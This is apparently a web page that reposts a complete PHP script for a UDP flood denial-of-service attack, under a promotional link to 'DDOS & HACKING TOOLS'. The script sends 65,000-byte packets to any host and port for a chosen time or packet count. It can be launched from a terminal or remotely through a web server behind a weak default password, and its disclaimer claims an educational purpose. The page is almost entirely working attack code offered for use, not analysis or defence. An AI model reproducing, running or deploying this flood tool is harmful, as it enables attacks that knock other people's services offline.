DDOS PHP Script

DDOS & HACKING TOOLS: http://yabuilder.com/AXYj

PHP DDOS script

<?php

/**
 * Script to perform a DDoS UDP Flood by PHP
 *
 *
 * @package DDoS
 * @link https://github.com/drego85/DDoS-PHP-Script The DDoS UDP flood GitHub project
 * @author Andrea Draghetti (original founder)
 * @author TheZer0
 * @author Smaury
 * @author moty66
 * @license http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt GPLv2
 *
 * This tool is written on educational purpose, please use it on your own good faith.
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
 *
 *
 */

// Current version
define('DDOS_VERSION',              '0.2' );

// MD5 Password to be used when the script is executed from the webserver, default is "apple"
define('DDOS_PASSWORD',             '1f3870be274f6c49b3e31a0c6728957f' );

// Script max execution time
define('DDOS_MAX_EXECUTION_TIME',0);

// Default and max packets size
define('DDOS_DEFAULT_PACKET_SIZE',  65000 );
define('DDOS_MAX_PACKET_SIZE',      65000 );

// Default byte to send
define('DDOS_DEFAULT_BYTE',"\x00");

// Loggin functions
define('DDOS_LOG_DEBUG',            4 );
define('DDOS_LOG_INFO',             3 );
define('DDOS_LOG_NOTICE',           2 );
define('DDOS_LOG_WARNING',          1 );
define('DDOS_LOG_ERROR',            0 );

// Output formats
define('DDOS_OUTPUT_FORMAT_JSON',   'json' );
define('DDOS_OUTPUT_FORMAT_TEXT',   'text' );
define('DDOS_OUTPUT_FORMAT_XML',    'xml' );

// Output status
define('DDOS_OUTPUT_STATUS_ERROR',  'error' );
define('DDOS_OUTPUT_STATUS_SUCCESS','success' );


/**
 * DDoS main class
 *
 * @author moty66
 * @since 0.2
 */
class DDoS {

    /**
     * Default parameters
     * @var array
     */
    private $params = array(
            'host' =>   '',
            'port' =>   '',
            'packet' => '',
            'time'  =>  '',
            'pass'  =>  '',
            'bytes' =>  '',
            'verbose'=> DDOS_LOG_INFO,
            'format'=> 'text',
            'output'=> ''
    );


    /**
     * Log labels
     * @var array
     */
    private $log_labels = array(
            DDOS_LOG_DEBUG => 'debug',
            DDOS_LOG_INFO => 'info',
            DDOS_LOG_NOTICE => 'notice',
            DDOS_LOG_WARNING => 'warning',
            DDOS_LOG_ERROR => 'error'
    );


    /**
     * Content type to sent in header
     * @var string
     */
    private $content_type = "";


    /**
     * Output buffer, will be printed later in text,json or xml format
     * @var array
     */
    private $output = array();


    /**
     * Initializer
     */
    public function __construct($params = array()) {

        ob_start();

        ini_set('max_execution_time',DDOS_MAX_EXECUTION_TIME);

        $this->set_params($params);

        $this->set_content_type();

        $this->signature();

        if(isset($this->params['help'])) {
            $this->usage();
            exit;
        }

        $this->validate_params();


        $this->attack();

        $this->print_output();

        ob_end_flush();
    }


    /**
     * Prints the script name and version number
     */
    public function signature() {
        if(DDOS_OUTPUT_FORMAT_TEXT == $this->get_param('format')) {
            $this->println('DDoS UDP Flood script');
            $this->println('version '.DDOS_VERSION);
            $this->println();
        }
    }


    /**
     * Prints the script usage
     */
    public function usage() {
        $this->println("EXAMPLES:");
        $this->println("from terminal:  php ./".basename(__FILE__)." host=TARGET port=PORT time=SECONDS packet=NUMBER bytes=NUMBER");
        $this->println("from webserver: http://localhost/ddos.php?pass=PASSWORD&host=TARGET&port=PORT&time=SECONDS&packet=NUMBER&bytes=NUMBER");
        $this->println();
        $this->println("PARAMETERS:");
        $this->println("help    Print this help summary page");
        $this->println("host    REQUIRED specify IP or HOSTNAME");
        $this->println("pass    REQUIRED only if used from webserver");
        $this->println("port    OPTIONAL if not specified a random ports will be selected");
        $this->println("time    OPTIONAL seconds to keep the DDoS alive, required if packet is not used");
        $this->println("packet  OPTIONAL number of packets to send to the target, required if time is not used");
        $this->println("bytes   OPTIONAL size of the packet to send, defualt: ".DDOS_DEFAULT_PACKET_SIZE);
        $this->println("format  OPTIONAL output format, (text,json,xml), default: text");
        $this->println("output  OPTIONAL logfile, save the output to file");
        $this->println("verbose OPTIONAL 0: debug, 1:info, 2:notice, 3:warning, 4:error, default: info");
        $this->println();
        $this->println("Note:   If both time and packet are specified, only time will be used");
        $this->println();
        $this->println("More information on https://github.com/drego85/DDoS-PHP-Script");
        $this->println();
    }


    /**
     * Start the UDP flood attack
     * TODO Rewrite the attack code, need to remove the double loop and to find a system to
     *      print out a progress bar when we are in text mode
     */
    private function attack(){

        $packets = 0;
        $message = str_repeat(DDOS_DEFAULT_BYTE, $this->get_param('bytes'));

        $this->log('DDos UDP flood started');

        // Time based attack
        if($this->get_param('time')) {

            $exec_time = $this->get_param('time');
            $max_time = time() + $exec_time;

            while(time() < $max_time){
                $packets++;
                $this->log('Sending packet #'.$packets,DDOS_LOG_DEBUG);
                $this->udp_connect($this->get_param('host'),$this->get_param('port'),$message);
            }
            $timeStr = $exec_time. ' second';
            if(1 != $exec_time) {
                $timeStr .= 's';
            }
        }
        // Packet number based attack
        else {
            $max_packet = $this->get_param('packet');
            $start_time=time();

            while($packets < $max_packet){
                $packets++;
                $this->log('Sending packet #'.$packets,DDOS_LOG_DEBUG);
                $this->udp_connect($this->get_param('host'),$this->get_param('port'),$message);
            }
            $exec_time = time() - $start_time;

            // If the script end before 1 sec, all the packets were sent in 1 sec
            if($exec_time <= 1){
                $exec_time=1;
                $timeStr = 'about a second';
            }
            else {
                $timeStr = 'about ' . $exec_time . ' seconds';
            }
        }

        $this->log("DDoS UDP flood completed");

        $data = $this->params;

        // We don't need to send pass, packets and time as data for json and xml, ad we are sending the total
        unset($data['pass']);
        unset($data['packet']);
        unset($data['time']);

        $data['port'] = 0 == $data['port'] ? 'Radom ports' : $data['port'];
        $data['total_packets'] = $packets;
        $data['total_size'] = $this->format_bytes($packets*$data['bytes']);
        $data['duration'] = $timeStr;
        $data['average'] = round($packets/$exec_time, 2);

        $this->set_output('UDP flood completed', DDOS_OUTPUT_STATUS_SUCCESS,$data);

        $this->print_output();

        exit;
    }


    /**
     * UDP Connect
     * @param string    $h Host name or ip address
     * @param integer   $p Port number, if the port is 0 then a random port will be used
     * @param string    $out Data to send
     * @return boolean  True if the packet was sent
     */
    private function udp_connect($h,$p,$out){

        if(0 == $p) {
            $p = rand(1,rand(1,65535));
        }

        $this->log("Trying to open socket udp://$h:$p",DDOS_LOG_DEBUG);
        $fp = @fsockopen('udp://'.$h, $p, $errno, $errstr, 30);

        if(!$fp) {
            $this->log("UDP socket error: $errstr ($errno)",DDOS_LOG_DEBUG);
            $ret = false;
        }
        else {
            $this->log("Socket opened with $h on port $p",DDOS_LOG_DEBUG);
            if(!@fwrite($fp, $out)) {
                $this->log("Error during sending data",DDOS_LOG_ERROR);
            }
            else {
                $this->log("Data sent successfully",DDOS_LOG_DEBUG);
            }
            @fclose($fp);
            $ret = true;
            $this->log("Closing socket udp://$h:$p",DDOS_LOG_DEBUG);
        }

        return $ret;
    }


    /**
     * Parse parameters from argv, post or get
     * @todo Remove setting params from this method, let do it outside the class
     */
    private function set_params($params = array()) {

        $original_params = array_keys($this->params);
        $original_params[] = 'help';

        foreach($params as $key => $value) {
            if(!in_array($key, $original_params)) {
                $this->set_output("Unknown param $key", DDOS_OUTPUT_STATUS_ERROR);
                $this->print_output();
                exit(1);
            }
            $this->set_param($key, $value);
        }
    }

    /**
     * Validate and santize the parameters
     */
    private function validate_params() {

        // Password for web users
        if(!$this->is_cli() && md5($this->get_param('pass')) !== DDOS_PASSWORD) {
            $this->set_output("Wrong password", DDOS_OUTPUT_STATUS_ERROR);
            $this->print_output();
            exit(1);
        }
        elseif(!$this->is_cli()) {
            $this->log('Password accepted');
        }

        if(!$this->is_valid_target($this->get_param('host'))) {
            $this->set_output("Invalid host", DDOS_OUTPUT_STATUS_ERROR);
            $this->print_output();
            exit(1);
        }
        else {
            $this->log("Setting host to " . $this->get_param('host'));
        }
        if("" != $this->get_param('port') && !$this->is_valid_port($this->get_param('port'))) {
            $this->log("Invalid port", DDOS_LOG_WARNING);
            $this->log("Setting port to random",DDOS_LOG_NOTICE);
            $this->set_param('port', 0);
        }
        else {
            $this->log("Setting port to ".$this->get_param('port'));
        }

        if(is_numeric($this->get_param('bytes')) && 0 < $this->get_param('bytes')) {
            if(DDOS_MAX_PACKET_SIZE < $this->get_param('bytes')) {
                $this->log("Packet size exceeds the max size", DDOS_LOG_WARNING);
            }
            $this->set_param('bytes',min($this->get_param('bytes'),DDOS_MAX_PACKET_SIZE));
            $this->log("Setting packet size to ". $this->format_bytes($this->get_param('bytes')));
        }
        else {
            $this->log("Setting packet size to ".$this->format_bytes(DDOS_DEFAULT_PACKET_SIZE),DDOS_LOG_NOTICE);
            $this->set_param('bytes',DDOS_DEFAULT_PACKET_SIZE);
        }

        if(!is_numeric($this->get_param('time')) && !is_numeric($this->get_param('packet'))) {
            $this->set_output("Missing parameter time or packet", DDOS_OUTPUT_STATUS_ERROR);
            $this->print_output();
            exit(1);
        }
        else {
            // Just to be sure that users does not submit a wrong time "example: a,-1" and correct packet
            $this->set_param('time', abs(intval($this->get_param('time'))));
            $this->set_param('packet', abs(intval($this->get_param('packet'))));
        }

        if('' != $this->get_param('output')) {
            $this->log("Setting log file to " .$this->get_param('output'),DDOS_LOG_INFO);
        }

    }


    /**
     * Returns a param
     * @param   string  $param name of the parameter
     * @return  string|null Value of the parameter or null if not exsist
     */
    public function get_param($param) {
        return isset($this->params[$param]) ? $this->params[$param] : null;
    }

    /**
     * Add a parameter
     * @param string    $param
     * @param mixed     $value
     */
    private function set_param($param,$value) {

        $this->params[$param] = $value;
    }

    /**
     * Set the content type for each output format
     */
    private function set_content_type() {

        // Set the content type headers only for web
        if($this->is_cli()) {
            return;
        }

        switch($this->get_param('output')) {
            case DDOS_OUTPUT_FORMAT_JSON : {
                $this->content_type = "application/json; charset=utf-8;";
                break;
            }
            case DDOS_OUTPUT_FORMAT_XML : {
                $this->content_type = "application/xml; charset=utf-8;";
                break;
            }
            default : {
                $this->content_type = "text/plain; charset=utf-8;";
                break;
            }
        }

        header("Content-Type: ". $this->content_type);
        $this->log('Setting Content-Type header to ' . $this->content_type, DDOS_LOG_DEBUG);
    }


    /**
     * Check if we are running the script from terminal or from a web server
     * @return boolean True if sapi name is cli
     */
    public static function is_cli() {
        return php_sapi_name() == 'cli';
    }


    /**
     * Get random port number
     * @return number
     */
    public function get_random_port() {
        return rand(1,65535);
    }


    /**
     * Check if the port is valid
     * @param   integer     $port
     * @return  integer     Port number or 0 if invalid
     */
    function is_valid_port($port = 0){
        return ($port >= 1 &&  $port <= 65535) ? $port : 0;
    }


    /**
     * Check if the host name or the ip address are valid
     * @see https://en.wikipedia.org/wiki/Hostname
     * @param string $target
     * @return boolean
     */
    function is_valid_target($target) {
        return  (   //valid chars check
                preg_match("/^([a-z\d](-*[a-z\d])*)(\.([a-z\d](-*[a-z\d])*))*$/i", $target)
                //overall length check
                &&  preg_match("/^.{1,253}$/", $target)
                // Validate each label
                &&  preg_match("/^[^\.]{1,63}(\.[^\.]{1,63})*$/", $target)
        )
        ||  filter_var($target, FILTER_VALIDATE_IP);
    }


    /**
     * Convert from bytes to human readable size
     * @param integer $bytes
     * @param integer $precision Default:2
     * @return string
     */
    function format_bytes($bytes, $dec = 2) {
        // exaggerating :)
        $size   = array('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB');
        $factor = floor((strlen($bytes) - 1) / 3);
        return sprintf("%.{$dec}f", $bytes / pow(1024, $factor)) . @$size[$factor];
    }


    /**
     * Prepare the output data. to be printed in the correct format later
     * @param string    $message
     * @param integer   $code
     * @param mixed     $data
     */
    private function set_output($message, $code, $data = null) {

        $this->output= array("status" =>$code,"message" => $message);
        if(null != $data) {
            $this->output['data'] = $data;
        }
    }

    /**
     * Print the output of the script
     */
    private function print_output() {
        switch($this->get_param('format')) {
            case DDOS_OUTPUT_FORMAT_JSON: {
                echo json_encode($this->output);
                break;
            }

            case DDOS_OUTPUT_FORMAT_XML: {
                $xml = new SimpleXMLElement('<root/>');
                array_walk_recursive($this->output, function($value, $key)use($xml){
                    $xml->addChild($key, $value);
                });
                print $xml->asXML();
                break;
            }

            default: {
                $this->println();
                array_walk_recursive($this->output, function($value, $key) {
                    $this->println($key .': ' . $value);
                });
            }
        }
    }

    /**
     * Logging system, very useful for debugging
     *
     * @param string    $message    Message
     * @param integer   $code       Log code
     */
    private function log($message,$code = DDOS_LOG_INFO) {
        if($code <= $this->get_param('verbose') && $this->get_param('format') == DDOS_OUTPUT_FORMAT_TEXT) {
            $this->println('['.$this->log_labels[$code] . '] ' . $message);
        }
    }

    /**
     * Save output to file
     * @param unknown $message
     */
    private function log_to_file($message) {
        if('' != $this->get_param('output')) {
            file_put_contents($this->get_param('output'), $message, FILE_APPEND | LOCK_EX);
        }
    }


    /**
     * Prints a message with a carriage return
     * @param string    $message Message to print
     * @param integer   $indent Number of tabs to print before the message
     */
    private function println($message = '') {
        echo $message . "\n";
        $this->log_to_file($message . "\n");
        ob_flush();
        flush();
    }
}


$params = array();
if(DDoS::is_cli()) {
    global $argv;
    parse_str(implode('&', array_slice($argv, 1)), $params);
}
elseif(!empty($_POST)) {
    foreach($_POST as $index => $value) {
        $params[$index] = htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
    }
}
elseif(!empty($_GET['host'])) {
    foreach($_GET as $index => $value) {
        $params[$index] = htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
    }
}


$ddos = new DDoS($params);